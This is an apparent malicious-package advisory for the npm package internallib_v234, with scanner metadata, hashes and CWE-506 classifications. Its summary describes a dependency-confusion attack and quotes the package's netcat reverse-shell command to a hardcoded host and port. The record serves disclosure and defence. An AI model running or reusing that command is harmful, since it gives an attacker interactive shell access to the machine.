-= Per source details. Do not edit below this line.=-
internallib_v234@1.0.6 exports a command() function whose body unconditionally invokes /bin/bash -c "nc -vn 10.0.74.133 13337 -e /bin/bash", opening an interactive reverse shell from the installer to a hardcoded RFC1918 endpoint (10.0.74.133:13337). Prior to launching the shell, index.js runs whereis nc to confirm netcat is available on the host. The package also exhibits a dependency-confusion shape: the name mimics an internal-library naming convention, it declares itself as its own dependency (internallib_v234: ^1.0.0), and CI configuration references a private Verdaccio registry (npm update --registry http://0.0.0.0:4873/). The combination indicates a targeted attack against an organization that hosts a private internallib_v234 internally; installing/loading this public version and invoking the exported function yields interactive shell access on the installer's machine to the attacker.
{
"malicious-packages-origins": [
{
"versions": [
"1.0.3"
],
"sha256": "04c12e7b603e60e2fdbd050a2a9b15b4061040b31bbb6bdf6d90b2295fd9a47e",
"modified_time": "2026-07-06T05:28:11Z",
"source": "amazon-inspector",
"id": "IN-MAL-2026-008038",
"import_time": "2026-07-06T06:35:49.401481717Z"
},
{
"versions": [
"1.0.5"
],
"sha256": "d907ff37eec91a2e89c95755697ca2765def0877cf48afd76e5126cffa7cf02e",
"modified_time": "2026-07-06T05:28:27Z",
"source": "amazon-inspector",
"id": "IN-MAL-2026-008040",
"import_time": "2026-07-06T06:35:49.521753011Z"
},
{
"versions": [
"1.0.6"
],
"sha256": "8af2fded6fa5a25932255b36ee1a4e4293d955d9a74d54334ec133105f3ec087",
"source": "amazon-inspector",
"modified_time": "2026-07-06T05:28:18Z",
"id": "IN-MAL-2026-008039",
"import_time": "2026-07-06T06:35:49.469873614Z"
},
{
"versions": [
"1.0.7"
],
"sha256": "c81ea4974b3fc3c86e91ae44b3f9d618b24d1849da30ac74427884b51142eacf",
"modified_time": "2026-07-06T05:28:03Z",
"source": "amazon-inspector",
"id": "IN-MAL-2026-008037",
"import_time": "2026-07-06T06:35:49.338564124Z"
},
{
"versions": [
"1.0.4"
],
"sha256": "d0a13bb05b557bb0d0570548da606cf43184f0f80870d95f14299e0437de8c71",
"modified_time": "2026-07-06T05:28:35Z",
"source": "amazon-inspector",
"id": "IN-MAL-2026-008041",
"import_time": "2026-07-06T06:35:49.591623935Z"
}
]
}{
"package_integrity": [
{
"filename": "internallib_v234-1.0.3.tgz",
"hashes": {
"sha512_sri": "sha512-oPEsIlX6Qr9Iv1H9KWUiU7SSn/sCvXAek/GLl9ErcQTkY2IgvwptTCIqxc0n+iVhGWh5TyAZ0DEuXdVsxF4b/Q==",
"sha1": "56fe81a96d30078411d388c477a96bcd9586b1ce"
}
}
],
"evidence_files": [
{
"sha256": "c7c173225ff214d98f2f754db88502220b38835aba3e4c89d9b3ffc09f2ceeb0",
"path": "index.js",
"tlsh": "41c022a785960b2ab70822e09c01f862a8438c703a3c40b0e0888151009384e66470bf"
},
{
"sha256": "272b710ae50ce4eb6bd1f2dcefc2fb59c5482be4d9cd058d06f848901ce44dd2",
"path": "package.json",
"tlsh": "26d02e200d235cb321c5036a2c69801372608e3f004abc0c9bcb0a2c40cf2b7a8fd30c"
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v234/MAL-2026-6796.json"
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]